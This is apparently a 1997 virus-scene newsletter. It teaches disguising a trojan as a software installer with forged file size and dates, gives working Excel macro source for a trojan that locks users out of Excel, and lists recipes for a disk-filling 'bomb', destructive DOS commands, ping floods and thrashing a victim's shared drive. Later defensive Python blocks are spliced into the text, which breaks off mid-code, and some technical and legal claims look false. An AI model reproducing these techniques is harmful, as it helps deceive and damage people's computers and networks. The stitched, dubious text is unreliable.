God@rky's Virus Heaven Newsletter #3
Written by God@rky
(C)Circle-A Computers 1997 All Rights Reserved...
-----------------------------------------------------------------------------
**Warning** This magazine deals with viruses, their production, and
their distribution, and frankly anything else that is virus related that we
wish to publish here. The ethics of this magazine's very existence may upset
you.
The intent of this magazine is to keep those interested in collecting
or authoring viruses up to date as well as we can with some of the information
that can be found here and abroad.
If you have any questions, comments, ideas or article submissions, by all
means send them via E-mail at: godarky@ilf.net
-----------------------------------------------------------------------------
CONTENTS
Section One - Introduction
Section Two - How To Hide Your Virus/Trojan by Virulent
Section Three - MS-Excel Shutdown Trojan
Section Four - An Intro To Basic Computer Anarchy &
The Techniques Involved
Section Five - Site News & Info
Section Six - Virus Heaven Hacked?!?!
Section Seven - The Browser Wars Become Uneven? Maybe...
Section Eight - A Small Virus Section
Section Nine - The End
=============================================================================
Introduction
Yeah... It's been a little while since I have been able to crank out
an issue of the Virus Heaven Newsletter. Those who have been e-mailing me
asking when the next issue would be out, know that the date has been
continually falling further and further behind.
The backlog started when I threw out some articles for Virus Bits &
Bytes magazine issue #4, and then continued through some upgrades on my
system as well as an increasingly larger amount of time I am having to
spend at work nowadays.
Since the First issue, I have been getting all kinds of submissions
for the newsletter. Some have been used in Virus Bits & Bytes Magazine #4,
others have been held for this somewhat special issue of the newsletter.
These are articles I was reluctant to publish due to the fact that
they don't really deal with viruses, but more the ilk of Trojans and other
forms of Malware. But due to the nature of the computer virus, I have
decided that these things belong on their own shelf, and will thus have
their own Issue, for the most part.
Most of this newsletter is readers' submissions. If they want to be
contacted, they will have left an e-mail address in their submission.
Anyhow, Enjoy the issue, and I will keep you posted about the next
full scale issue to be released!
=============================================================================
SECTION - 2
How to Hide Your Virus/Trojan (Revisited)
=========================================
by Virulent (mdabrowski@juno.com)
*WARNING* This article contains info that might be offensive to some. May
I remind the reader, that in the United States, Canada, and the UK, virus
creation is not a crime. Frankly, it's legal everywhere except for Sweden
and Switzerland. The author disclaims any responsibility, blah, blah,
blah.
The author, however interested, doesn't condone the creation of
destructive viruses. He hates them himself. If you're gonna do it, he
does condone amusing viruses or ones with nifty visual displays.
*NOTES* Let it be known that I consider myself an AVer, as well as a
VXer. Any AVer that's not in the least bit a VXer is just an AV
wannabe. Any VXer that isn't a tad bit an AVer is an idiot. If you're
around viruses as long as you might be, you're bound for infection. I have,
and I have been toasted by such wonderful creations as Natas. I have no ill
will against either community, and I love being a part of them both. If this
article angers anyone in the AV community, that's their problem. I believe
I'm making and will make lots of contributions to the field. Bug off.
I'd also like it to be known that, for one reason alone, I have
personal contempt for George Wenzel. I almost like most people in the AV
community. I have no ill will towards the moderator of alt.comp.virus.
Without him, alt.comp.virus would be flooded with make-money-fast posts and
such. Kudos.
My one reason for hating Mr. Wenzel is the fact that he likes to
complain about VXers to their ISPs. This is a mean and contemptuous practice
that must be stopped. No one should be "afraid" to post whatever they want
on the Net. If you've been "harassed" by Mr. Wenzel at any point, contact me.
I'd like to hear about it. And that's the only reason I dislike the man. I
think he does a fine job on producing the comp.virus mini-faq.
This has been my two-cent editorial on myself and those around
me. Read it and weep, compadre.
Necessary Software:
NUTILS20.ZIP - The Nowhere Utilities
Available everywhere. They're a must have for any power
user, not just those into viruses.
STEGANOS.ZIP - Steganos
Available in many places, or by contacting me.
It hides any file into a graphic, sound, or ASCII file.
Also will support new file types, if necessary.
=========================================
An article in CPI Newsletter Issue 2 starts, "So you've made the
most k-rad virus in the history of the world. So what do you do with the
damn thing?" This topic has been revisited by me, only because I've found
new techniques that must be told. I'll also go over many older
techniques, for the sake of completeness. For my ideas, the two pieces
of software above are necessary. I use both of them everyday, not just for
my viral needs.
I. The Basics
=============
Okay, here goes. The most basic way to hide a piece of viral
software is to simply infect any old piece of shareware and upload it to
a BBS or post it to a newsgroup. This is pretty pointless, especially for
viruses that are not encrypted in any way or just don't work. They also
get pointed out quickly, and you get flamed. Or George Wenzel gets your
account canceled, whatever floats your boat. You should feel like a
moron.
II. PKLITE Files - More Virus, Less Byte
========================================
Doing! A light goes on in your head. You decide to PKLITE the
file, remove the header, and then upload/post it. This may fool some
scanners, but the good ones may still catch it.
PKLITE reduces the size of a file. Viruses increase the size. If,
in the end, the PKLITEd infected file is smaller than the original, use
RESIZE, one of The Nowhere Utilities. That was Tip #1. In the end, even
if the end user doesn't have a good scanner, he still may notice the file
has changed, if:
1.) You haven't changed the size of the file in PACKING.LST or
what have you.
2.) There's no authentication on the ZIP file. This is especially
so for software from big name companies.
3.) The time/date stamp reads 1:05 a.m. yesterday morning when
the rest of the files read 3:15 p.m., July 9th, 1994.
There are utilities around to solve these problems. Windows
Notepad will solve #1. A program - I can't remember the name - distributed
with an issue of 40Hex might solve #2. FIXTIME (A Nowhere Utility) will
solve #3.
Voila! The end user is completely fooled. Even though you may be
miles away, you can hear him/her swearing as his CMOS is wiped out, or
whatever.
You go into school the next day, and you get a note from a
friend. He needs a copy of ZeroBug.52086GFgbf?64, a new virus of which you
have one of the 4 copies in the world. George Wenzel got your friend's
account canceled, so he can't get it via e-mail. You decide the only way to
get it to him is through the school's BBS.
III. Getting that file to your Vx buddy
=======================================
It turns out the teacher running the BBS is a paranoid little
jerk that not only has 19 virus scanners scanning each upload, but personally
inspects each file for unusual stuff. And they pay him for this! Since the
guy checks everything out, using the PKLITE technique ain't gonna help
you. Luckily, you and your friend picked up a copy of STEGANOS, either
from that brilliant article author, Virulent, or off some site on the Net.
You decide to hide Zerobug in a picture of your personal hero,
Bill Gates, or maybe that F-Prot wallpaper BMP Datafellows distributes.
STEGANOS is simple to use. The syntax is as such:
STEGANOS <e/d> <graphic/sound/ascii file> <file to hide> <password> </b> </d>
E or D means encode or decode
/B means keep a backup of the original graphic file
/D means to delete the file you've just hidden.
It's pretty simple. So the jerk at school looks at your BMP of
Chairman Bill, and just sees some pixels with strange colors. "Hmm. Must
have had errors in the transfer." Your friend downloads the BMP and now
has a copy of the now infamous Zerobug variant. (BTW, Zerobug is a neat
virus, especially when you deliberately infect yourself to see the nifty
effect. :) )
IV. Can You Go Over That Again?
===============================
You may want to know EXACTLY how to do what I said in Section II,
so I'll go over the command-by-command play of me replacing a copy of
SoftRam, a Windows memory manager, with a trojan horse.
It turns out that the thing I've selected to replace SoftRam with
is a trojan, so I can't just infect the installation file. The setup's a
Windows program anyway, so it'll be futile. I'll have to replace SETUP.EXE
with the trojan. The trojan's name is Hemoroids, which I got off God@rky's
web site. Here's a DIR of the original files in the zip:
README   WRI    20480 05-08-95 12:00p
SETUP    EXE   273920 05-08-95 12:00p
SETUP    INS    21085 05-08-95 12:00p
SETUP    LGO      391 05-08-95 12:00p
SETUP    PKG      193 05-08-95 12:00p
SRAM     Z      95294 05-08-95 12:00p
SRAMRES  DLL    15040 05-08-95 12:00p
~INS0763 LIB     7190 05-08-95 12:00p
IMORTAL1 ASC     1448 07-01-96  7:15p
HEMOROID EXE     2448 06-20-96 10:32p
IMORTAL1.ASC would be an ad for the BBS I downloaded it from,
which would be The Isles of the Immortals. (203-266-6079 8N1)
I'd then take HEMOROID.EXE, which is 2448 bytes. Due to the
271,472 byte difference between HEMOROID.EXE and SETUP.EXE, I can't just
rename HEMOROID.EXE. There's also the year time/date difference. So I'll
first RESIZE (A Nowhere Util) HEMOROID to the size of SETUP:
RESIZE -R 273920 HEMOROID.EXE
-R is so that the 270,000 some odd bytes put into HEMOROID aren't
all zeros, or it'll compress to around 5k. HEMOROID and SETUP are now the
same size. Now the time/date stamp:
FIXTIME 05-08-95 12:00 HEMOROID.EXE
The directory listing should look like this now:
README   WRI    20480 05-08-95 12:00p
SETUP    EXE   273920 05-08-95 12:00p
SETUP    INS    21085 05-08-95 12:00p
SETUP    LGO      391 05-08-95 12:00p
SETUP    PKG      193 05-08-95 12:00p
SRAM     Z      95294 05-08-95 12:00p
SRAMRES  DLL    15040 05-08-95 12:00p
~INS0763 LIB     7190 05-08-95 12:00p
IMORTAL1 ASC     1448 07-01-96  7:15p
HEMOROID EXE   273920 05-08-95 12:00p
Good. Now you can rename HEMOROID to SETUP. But the dang project
isn't done yet. We need to PKZIP it up! Here's the two zip files.
SOFTRAM.ZIP is the original. SOFTRAMI.ZIP is the infected one. I've also
fixed the time/date stamp on SOFTRAMI.ZIP. The reason the ZIP's time/date
stamp is so new, is that, since I downloaded it from a BBS, a ZIP comment
was added, changing the date.
SOFTRAMI ZIP   394813 09-09-96  9:50p
IMORTAL1 ASC     1448 07-01-96  7:15p
SOFTRAM  ZIP   371552 09-09-96  9:50p
IMORTAL1.ASC is our BBS comment file. Since the ZIPs aren't
relatively exact until we add the comment, I'll do it:
PKZIP -Z SOFTRAMI.ZIP < IMORTAL1.ASC
And I'll fix the time/date stamp again. Now SOFTRAMI.ZIP could
effectively pass as the original. And there's only a 23,261 byte size
difference. And no one usually runs FC (file compare) on two ZIPs like
that. Now you'd upload SOFTRAMI.ZIP (after renaming it and such) to your
favorite BBS, or post it to your favorite binaries newsgroup.
I never actually had SoftRam. It's a commercial program, so I had
someone who did have it send me a DIR of the files to work with. I
wouldn't use SoftRam as a trojan myself, considering there's more non-warez
newsgroups and BBSes than there are warez ones, and we're going for
maximum reach with the same file, eh?
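The walkthrough above relies on two things a casual check looks at, size and timestamp, both of which RESIZE and FIXTIME forge trivially. What they cannot forge is content: the `-R` switch fills the padding with non-zero junk precisely so it stays incompressible, and that junk has a statistical fingerprint. The following is an added defender-side example, written for this edition and not part of Virulent's article or any tool he names. It parses the DOS MZ header to find where the declared load image ends, measures whatever trails it (the overlay), and reports its Shannon entropy. The sample executable is constructed inline and is not a real program; a real check would also compare the file's hash against the vendor's published one, since legitimate installers carry overlays too and entropy alone proves nothing.

```python
import math
import random
import struct
from collections import Counter


def constructed_exe(image_size=512, pad=4096, random_fill=True, seed=1234):
    """Build a fake DOS MZ executable (constructed for this example, not a
    real program) of `image_size` bytes, then append `pad` filler bytes
    beyond the image the header declares, mirroring a file padded out to a
    target length with either random junk or zeros."""
    pages, last = divmod(image_size, 512)
    if last:
        pages += 1
    header = bytearray(64)
    header[0:2] = b"MZ"
    struct.pack_into("<HH", header, 2, last, pages)   # e_cblp, e_cp
    struct.pack_into("<H", header, 8, 4)              # e_cparhdr: 64-byte header
    image = bytes(header) + b"\xCD\x20" + b"\x90" * (image_size - 66)
    if random_fill:
        rng = random.Random(seed)
        filler = bytes(rng.getrandbits(8) for _ in range(pad))
    else:
        filler = b"\x00" * pad
    return image + filler


def mz_image_size(data):
    """Size of the load image according to the MZ header, or None if the
    data is not an MZ executable."""
    if len(data) < 28 or data[:2] != b"MZ":
        return None
    e_cblp, e_cp = struct.unpack_from("<HH", data, 2)
    size = e_cp * 512                 # e_cp counts 512-byte pages
    if e_cblp:                        # e_cblp: bytes used on the last page
        size -= 512 - e_cblp
    return size


def shannon_entropy(buf):
    """Bits per byte; 0.0 for constant data, close to 8.0 for random data."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def overlay_report(data):
    """Locate the overlay past the declared image and characterise it."""
    image = mz_image_size(data)
    if image is None:
        return {"mz": False}
    overlay = data[image:]
    return {
        "mz": True,
        "image_size": image,
        "overlay_size": len(overlay),
        "overlay_entropy": round(shannon_entropy(overlay), 2),
    }


if __name__ == "__main__":
    print("random padding:", overlay_report(constructed_exe()))
    print("zero padding:  ", overlay_report(constructed_exe(random_fill=False)))
```

A large overlay with entropy near 8 bits per byte that is neither a recognised archive nor a known packer's data section is exactly the pattern the RESIZE step leaves behind, whereas zero padding shows up as a large overlay with entropy 0. Either way the finding is a reason to pull the vendor's checksum, not a verdict on its own.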
V. Conclusion
=============
I've gone over a lot of techniques and such with you today, and I
hope you use them well. As always, I take no responsibility. I hope this
article sort of raises my standing in the Vx community, while not
lowering it in the Av community. If you have any thing to add to this
article, please e-mail me. If you have a flame, and are on a Unix-type
system, type it into a text file and move it to /dev/null.
In the future, I intend to write more articles and to possibly
come out with my own virus scanner to take out any virus on the WildList
or whatever. I hope to eventually even be one of the participants. If
you'd like to join me on any of my yet-to-be-infamous exploits, my e-mail
address is at the top of this article. Thanks, Virulent.
=============================================================================
SECTION - 3
MS-Excel Macro - Shutdown Trojan
The "shutdown.xls" is a trojan that although nondestructive is
sure to piss off and confuse the average Excel user. It contains an
Auto_Open macro which creates an ".xla" add-in file in the person's Excel
startup directory entitled "msexcel.xls" (sounds pretty innocent, kinda like
something you certainly wouldn't want to delete). The sole purpose of this
file is to close Excel. The first time you open shutdown.xls, it creates this
xla file then disappears then shuts Excel off. Every time you try to open
Excel in the future, it starts to fire up then automatically opens the xla
file in the startup directory then shuts down. Until you delete the
msexcel.xls file in your startup directory, you will be unable to open Excel.
The beauty of an xla file is that you can't open it to see the contents.
No one is going to want to delete something that they can't look at first,
especially with a name like msexcel.xls. If you want to create this yourself,
the source code to the macro is below. I have tested it using Excel 5 for
Win3.1 and Excel for Win95.
Sub Auto_Open()
    Application.DisplayAlerts = False          ' no prompts while it runs
    Dim Start As String
    Start = Application.StartupPath            ' Excel's startup directory
    ChDir Start
    ExecuteExcel4Macro "VBA.MAKE.ADDIN(""msexcel.xla"")"  ' save as add-in there
    Application.Quit                           ' and close Excel
End Sub
That's it! Just name the file "msexcel.xls" and you are done!
(Editor's Note): If you would like to see more of this guy's work, check out
the Yohimbe Excel Macro Virus that appeared in Virus Bits & Bytes Magazine
Issue #4.
=============================================================================
SECTION - 4
An Introduction to basic computer anarchy and the techniques involved
McNasty 1996
-----------------------------------------------------------------------------
Why am I writing this?
I'm writing this due to the fact that I'm always being asked to help people
who want to learn how to hack or how to create mayhem on other people's
computers and I'm sick of repeating myself.
I personally will accept no responsibility for any of the methods I describe
creating damage on someone else's computer. If you're gonna do it, take the
rap for it yerself!
I'll try to outline some methods you can use to really give people a hard
time if you feel fit.
Contents:
The Worm (and how to create a simple one using common ingredients found
around the home)
Tricks using DOS
FakeMail
Networking Havoc
That's about all for this first tutorial, if you want more just drop me a
line or give God@arky a shout and he'll pass it on.
1. The Worm
What is a worm?
A worm is a piece of code that basically replicates itself locally (not to
be confused with a virus...the worm does not transfer from host to host,
it just fucks up the computer it's run on)
For example a file that just gets bigger and bigger until you got no more
space left on your HDD. Sounds funky? It's dead easy to write and it's
spectacular when it goes off!
Imagine a 50k exe file that when it's run suddenly changes to 200MB and if
you aint got 200MB free on your HDD you got big problems!
Try this (I've already done so and it works fine and dandy)
I've left out important bits, but once you get the idea it shouldn't be
hard to suss out how to make it even worse.
Create a text file using edit (I usually create a file that's full of spaces
with the words "This space left intentionally blank" in the middle of the
page) and press enter until it's quite large. Highlight the lot and copy and
paste the text a few times until you have quite a large txt file then save
it.
Next write a batch file (called 1.bat or something like that) that copies
your txt file onto itself and keeps looping.
example:
:loop
copy stuff.txt stuff2.txt
copy stuff.txt+stuff2.txt stuff.txt
dir stuff.txt
goto loop
now run the bat file and watch it grow.....within a few minutes you've got a
HUGE txt file that basically says 'this space left intentionally blank'
When you've got a file sufficiently large enough (ie you've run out of disk
space!) you've got the fun bit......
Enter the PK family....
OK, right, now just point PKZIP at it and you'll see the txt file compress
to around 100k (depending on the compression type you use.....I've actually
had it to about 50k!)
Now you have a 100K zip file containing a 200MB txt file.....
Right, now run ZIP2EXE on it and turn it into an exe file et voila! instant
bomb!
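Seen from the other side, the "instant bomb" is a compression-ratio anomaly, and the place to catch it is before anything is inflated onto the disk. What follows is an added defender-side example, written for this edition and not McNasty's code: it runs two checks over a ZIP, a cheap one that reads the ratios the central directory declares, and a streaming one that inflates an entry in chunks and stops at a byte budget, so a lying size field cannot talk its way past the limit. The sample archive is constructed in memory; its `stuff.txt` is a few MiB of spaces, the sort of content the copy-onto-itself loop produces. Python's `zipfile` locates the central directory from the end of the file, so the same checks work on the output of ZIP2EXE, which is the archive with an extractor stub in front.

```python
import io
import zipfile


# Constructed sample (not from the article): a 4 MiB file of spaces plus one
# ordinary small file, both deflated into an in-memory archive.
def build_sample_archive(payload_size=4 * 1024 * 1024):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("stuff.txt", b" " * payload_size)
        zf.writestr("readme.txt", b"This space left intentionally blank\r\n")
    return buf.getvalue()


def header_findings(data, max_ratio=100, max_total=64 * 1024 * 1024):
    """First pass using only the sizes the central directory declares.

    Flags entries whose declared ratio is implausibly high and archives whose
    declared total exceeds a budget. These fields are written by whoever made
    the archive, so treat a clean result as a hint, not proof.
    """
    findings = []
    total = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            total += info.file_size
            ratio = info.file_size / max(info.compress_size, 1)
            if ratio > max_ratio:
                findings.append((info.filename, "ratio", int(ratio)))
    if total > max_total:
        findings.append(("*", "total", total))
    return findings


def stream_limit(data, name, cap, chunk=64 * 1024):
    """Inflate one entry chunk by chunk and stop once `cap` bytes have come out.

    Returns (bytes_produced, exceeded). This measures the real inflated size,
    which is the only number the archive cannot lie about.
    """
    produced = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as fh:
        while True:
            piece = fh.read(chunk)
            if not piece:
                return produced, False
            produced += len(piece)
            if produced > cap:
                return produced, True


if __name__ == "__main__":
    sample = build_sample_archive()
    print("archive size:", len(sample), "bytes")
    print("header findings:", header_findings(sample))
    print("stuff.txt under a 1 MiB budget:",
          stream_limit(sample, "stuff.txt", 1024 * 1024))
```

Run on the sample, the header pass flags `stuff.txt` at a ratio in the hundreds to one and leaves `readme.txt` alone; the streaming pass stops a little past the 1 MiB budget instead of writing out the whole payload. The budget is the check worth enforcing in an upload gateway or mail filter, because it bounds what the inflation can cost regardless of what the headers claim.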
You can add a few little extras here. There's a program in the nowhere
utilities that's a file padder. Run that and point it at your exe file to
make it exactly the same as a known file on the victim's computer. Then
plant it and sit back and watch the fireworks.
Another way of getting the victim to run the bomb is to get a copy of QBASIC
4.5 or VB and write a little program that looks like an installer, but
instead of installing it's doing damage. I got a guy with this and he was
running the installer for 20 mins. After he got bored of waiting he rebooted
only to find that his HDD was full of a HUGE txt file (he had a 1GB HDD) and
wouldn't boot 'cos the boot sector had been corrupted.
The hardest thing with a worm is actually getting the victim to run it. If
you use one of the ways I described it should make it a lot easier to dupe
your victim into committing HD Murder.
2. Tricks using DOS
Yeah yeah yeah I know what you're saying 'we use windows, why use dos?'.
Basically you can do a hellova lot more with a CLI than you can with a GUI
(at least at the moment you can) and it's easier to work with (as far as I'm
concerned!)
Some undocumented stuff to do in DOS (some of it good some of it not)
ONLY TRY THESE IF YOU WANT TO AND DON'T EVEN THINK ABOUT BLAMING ME IF YOU
FUCK UP YOUR COMPUTER!
Echo 123>clock$
This is a funky little command that overwrites your internal dos variable
clock$ and crashes your computer with a stack overflow. After rebooting you
will notice that your bios has been corrupted and depending on your bios,
all your settings have been filled with shit. Some BIOS's only get the date
and time corrupted, but some actually completely reset themselves (not nice
if your bios doesn't have a HD autodetect!)
There are all sorts of internal variables that you can overwrite with the
echo command. To get a list of these type mem/debug/p and see what you can
play with BUT BE CAREFUL!
the eternally famous deltree /y c:\windows
just deletes your windows directory without prompting for confirmation.
This also works with format too.
Attrib c:\command.com +h +s +r
means that you'll have to boot from floppy until you unhide command.com.
A handy thing to do (but you need a little time in private) is to run
PCTOOLS or norton hex editor and change the boot sector info on your or
your victim's HDD from NON bootable disk blah blah blah to "This disk has
been infected by the Good-Times Virus" then every time you format a floppy
from your computer the boot sectors of the disks you format will have a
message about the goodtimes virus if you try to boot from them!
3. FakeMail (or how to confuse the hell out of lamers)
This is also very handy for stopping unwanted spam coming in by spammers
stealing your email address from the newsgroups.
In Netscape select Options, then Mail and News Preferences, then Identity
and change your return email address to whatever you want (I have been known
to make it the same email address as the victim you want to hit with the
fakemail so when he replies he just spams himself!)
NOTE: This takes effect on the NEXT email you send, so if you've already
selected to send an email and then change your return address and identity
it will not take effect on that email.
BE AWARE OF THIS AS IT CAN GET YOU IN SOME SHIT IF YOU SEND OBNOXIOUS MAILS
THINKING YOU'VE REMOVED ALL TRACE OF YOUR IDENTITY.
Also, be aware of the fact that this is not untraceable, the only way of
sending untraceable email is either by using the port25 option in UNIX or
using an anonymous remailer (even then the remailer has an obligation to
give your details to the authorities if requested to do so in some
countries)
4. Networking Havoc
If you have a network in your office or school you can create all sorts of
mayhem. Here a few ways to do so.
Ping!
If your net transport is tcpip you can really bring the network speed down by
ping flooding everyone. Find out the ip address of your victim(s) and then
just ping them continually from a bat file.
ie..
:loop
ping 127.0.0.1 (or the ip address of the victim's terminal)
goto loop
and then run the batch file in the background.
In windows95/NT if you have tcpip networking you have ping in your windows
directory as well as a few other things like telnet, and tracert.
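A batch-file ping loop like the one above is loud: one source, one destination, echo requests arriving far faster than any human would send them. The following is an added defender-side example, written for this edition and not part of McNasty's text, showing the detection side of that picture. It parses constructed ICMP log lines (the line format is an assumption made up for the example, not any real product's output) and keeps a sliding one-second window per source/destination pair, flagging the pair the first time the window fills past a threshold. The sample data has one host sending 300 echo requests at 5 ms spacing and another sending three ordinary pings.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed log line format (constructed for this example):
# "<date> <time.ms> ICMP echo-request <src> -> <dst>"
LINE_FMT = "{ts} ICMP echo-request {src} -> {dst}"
TS_FMT = "%Y-%m-%d %H:%M:%S.%f"


def _stamp(t):
    """Millisecond timestamp string in the assumed log format."""
    return t.strftime(TS_FMT)[:-3]


def constructed_log():
    """Constructed sample: a ping loop from 10.0.0.5 against 10.0.0.9 plus a
    normal one-off ping from 10.0.0.7, interleaved in time order."""
    t0 = datetime(1997, 3, 1, 9, 0, 0)
    lines = [LINE_FMT.format(ts=_stamp(t0 + timedelta(milliseconds=5 * i)),
                             src="10.0.0.5", dst="10.0.0.9")
             for i in range(300)]
    lines += [LINE_FMT.format(ts=_stamp(t0 + timedelta(seconds=i)),
                              src="10.0.0.7", dst="10.0.0.9")
              for i in range(3)]
    lines.sort()  # fixed-width timestamps sort correctly as strings
    return lines


def parse_line(line):
    """Return (timestamp, src, dst) for an echo-request line, else None."""
    parts = line.split()
    if len(parts) != 7 or parts[2] != "ICMP" or parts[3] != "echo-request":
        return None
    ts = datetime.strptime(parts[0] + " " + parts[1], TS_FMT)
    return ts, parts[4], parts[6]


def flood_sources(lines, window=timedelta(seconds=1), threshold=100):
    """Sliding-window rate check per (src, dst).

    Returns {(src, dst): (time_flagged, requests_in_window)} for every pair
    that reaches `threshold` echo requests within `window`.
    """
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, dst = parsed
        key = (src, dst)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:   # drop requests older than the window
            q.popleft()
        if len(q) >= threshold and key not in flagged:
            flagged[key] = (ts, len(q))
    return flagged


if __name__ == "__main__":
    for pair, (when, count) in flood_sources(constructed_log()).items():
        print(f"{pair[0]} -> {pair[1]}: {count} echo requests by {when.time()}")
```

The threshold and window are the tuning knobs; 100 requests per second per pair is far above anything a stock `ping` produces on its own, so the looping batch file trips it on its hundredth request while the three-packet ping from the other workstation never comes close.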
SwapFile Havoc!
If the victim on the network has a shared directory (ie to play network
doom etc..) you can really play hell with their computer.
Map the victim's directory
Create a new directory on the victim's shared directory.
create a bat file on your computer like this. (I'll use doom as an example)
:loop
copy x:\doom.wad x:\new\doom.wad
del x:\doom.wad
copy x:\new\doom.wad x:\doom.wad
del x:\new\doom.wad
goto loop
Basically, this copies the doom.wad backwards and forwards between the
original directory and the new directory. Bearing in mind that the doom.wad
is about 15MB and is deleted when copied, the victim just sees his hard
drive going ballistic and all his processes slow down to a crawl because
he's having to share hard drive access between his swapfile and a remote
process (which doesn't affect the speed of your terminal!)
I did this to a victim and he ended up reformatting his HD because his
computer was running like a pig and hammering his HD all the time.
Another advantage of running stuff like this from a remote terminal is that
if you are about to be discovered, you can always switch off the process.
Well, that's it for now. If you liked this, thanks. If you didn't, why did
you bother downloading it in the first place!
If you want more, let me know.
McNasty
=============================================================================
SECTION - 5
Site News & Info
By God@rky
Well there have been quite a few things going on in the VX world.
Perhaps I will remember it all, perhaps not.
One of the biggest additions to the Vx world recently was the
appearance of the West Coast Institute Of Virus Research (www.wcivr.com).
There has been much talk about this site, and I can see why. The site is
maintained by Falcon, and contains a very vast collection of Viruses.
In the newsgroup alt.comp.virus, there has been some squabbling over
whether or not the AV programs mentioned on the site detect the viruses or not.
Many of the viruses there are indeed detected. And I believe there will be
quite a few there that aren't currently detected. I personally don't have
the time to test my own site and collection, let alone Falcon's. And really,
what is it with the interest it has stirred up anyway of the AV folks. Since
when did they start caring whether claims a Vx site makes are true or not, or
for that matter backed by science? Get real. Anyways, the URL is:
http://www.wcivr.com
Give it a look-see, you may be surprised, and it may become a vastly used
bookmark in your browser.
The Virus Programming Instruction Page is back on-line with a new ISP.
Be sure and update your links to http://www.goodnet.com/~jwools/vir.htm
As many of you noticed (depending on where you picked up VBB Issue #4)
The VBB site has received a face-lift. Still in the same location, just
organized somewhat differently.
Received News awhile back, not sure if it is still available or not:
The Earth Crisis (203)753-3212 8N1
It runs a little slow on purpose. They have deliberately put up some
lame stuff to stop some people from calling. Supposed to be a HEAVY VX
BBS. Dunno, haven't had the desire to see my LD phone bill take a
rise recently, so I have not checked it out.
=============================================================================
SECTION - 6
Virus Heaven Hacked?!?!
By God@rky
I guess as many of you may have seen, The Virus Heaven Website was
hacked. The only damage done was visual, and simply remedied by re-loading
the HTML onto the site. Instead of the usual Anti-Censorship Garb that
appears on the graphics version of the site, the hacks left a "Microsoft
Nazis" logo there, and renamed the "40hex" zines to "40sex". As I said, it
was an uninspired easy hack, that was easily remedied. Then afterwards, I
was unable to access my E-mail or update the site. I am not sure if this
was due to Chaos changing my password (to prevent further hacks through my
account) and not informing me of the change, or if my account was hacked a
second time. The total time I was unable to update the site or check my
mail was exactly ONE MONTH.
Also, as many of you noticed, a week or two after my site was hacked,
The Alliance Virus Group page was hacked as well. The leftovers, at that
point named "The Alliance Virus Football Page" with links to a S.I.N. site
and some other site that escapes memory now, and captioned at the bottom,
"Hacked By DaFool".
During this time, I thought a lot about the site I maintain, and the
Service/Disservice I provide the Internet Community. At one point, I became
tired of the entire commotion that comes about when you make viruses
available over the Internet. The size of the withdrawals from my
precious wallet of spare time that the site made were quite large. I was
ready to end the site.
It was voiced by many, that DaFool, and who else hacked the ILF
Server were doing a great disservice to the entire hacking community, as
the server will provide a home, hassle free for such sites. Others stated
that it was probably a hack aimed at the Alliance for some kind of mental
masturbation in a "Hack-war" of some sorts. But then again, who really gives
a fuck, huh? The hack apparently provided a service, as security was upped at
ILF.
I have decided against shutting down the site for the time being.
I am not sure what made me change my mind to continue running the site...
Hell, who knows when it will change again. Many of the sites on ILF are now
gone. One of the hard drives was cleared, so they will be re-appearing in a
matter of time. But I thought it was important that I let you all know
why I wasn't responding to your mail or why the Virus Of the Month for
February were 2-3 months old.
=============================================================================
SECTION - 7
The Browser Wars Become Uneven? Maybe...
By God@rky
(NOTE: This article's primary reason for appearing in this issue, is
because of the possibility made for WWW trojans)
We all have been witness to the battle between Microsoft and
Netscape. The battlefield? Primarily the WWW. The weapons? All the
plug-in's and processor bogging features you can (or in some cases CAN'T)
handle.
But a new weapon brought in by MicroSoft, may have backfired.
That weapon is known as ACTIVE-X. I am not going to go into the specifics
of ACTIVE-X's flaws or security holes, there will be a URL at the end of
this article which will take you to a site that will tell you everything
you wanted to know about the problems with Internet Explorer and Active-X.
Apparently Active-X makes it possible to run *ANY* program on the
client machine of the person who is viewing the page with the proper
Active-X malware scripted into it. I suppose this means that a "harmless"
viewing of your favorite web site can trigger the FORMAT command, or even
a virus (Vx dropper).
From everything I have read, this is not possible with Netscape (any
version). And from recent news, I guess Microsoft isn't planning on plugging
these security holes. But then why would they. They didn't make it any
harder to create Macro Viruses with Office 97 in either Excel or Word. Now
that there are more than 400 Word Macro Viruses alone, and probably quite a
few more being made each day, there isn't much they can do.
Here is the URL for the site that dives into the world of
Over-If-Not-Hyper-Active-X and Internet Explorer:
http://www.halcyon.com/mclain/ActiveX/
(Note: Not sure, as I don't use Internet Explorer, but I would recommend
using Netscape when you visit this site. <grin>)
=============================================================================
SECTION - 8
The Small Virus Section
Well I just didn't think it would be right to do an issue without
some sort of virus info in it, so here we are. Some of you are familiar
with the King Lizard line of viruses (the Coconut family). Well here is
dooMSday's careful analysis of the first two coconut viruses, COCONUT-OW!
and COCONUT-AP!
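Before the listing, an added example from the defender's side that is not part of dooMSday's analysis or of the original newsletter. It turns three facts the analysis states into a static check for the COCONUT-AP! layout: the infector writes a 5-byte prefix at the start of the host (a near JMP followed by the "IN" marker the header places at offset 0103h, and the same word the infection routine compares against before skipping a file), the JMP displacement is the original file length minus 3 (`SUB AX,0003` after seeking to the end), and the body appended afterwards is 074Eh bytes long (`MOV CX,074E` before the second write). The check therefore does not stop at the marker, which any COM file could carry by accident, but confirms that the jump lands exactly 074Eh bytes before the end of the file. Because the check is static, the listing's INT 3 trick (copying the INT 21h vector over INT 3h and issuing DOS calls through it, which is what the header calls its debugger trap) never comes into play. The host and the "infected" layout are constructed here; the appended body is zero-filled placeholder, not virus code.

```python
import struct

# Constants derived from the listing that follows (see its header comment
# and the two write calls in the infection routine).
VIRUS_BODY_LEN = 0x074E     # MOV CX,074E: bytes appended to the host
SIGNATURE = b"IN"           # DB 49,4E at offset 0103h; checked as word 4E49h
COM_LOAD = 0x100            # COM files load at CS:0100h


def constructed_com(size=4096):
    """Harmless placeholder COM image (constructed): mov ax,4C00h / int 21h
    followed by NOP filler."""
    stub = bytes([0xB8, 0x00, 0x4C, 0xCD, 0x21])
    return stub + b"\x90" * (size - len(stub))


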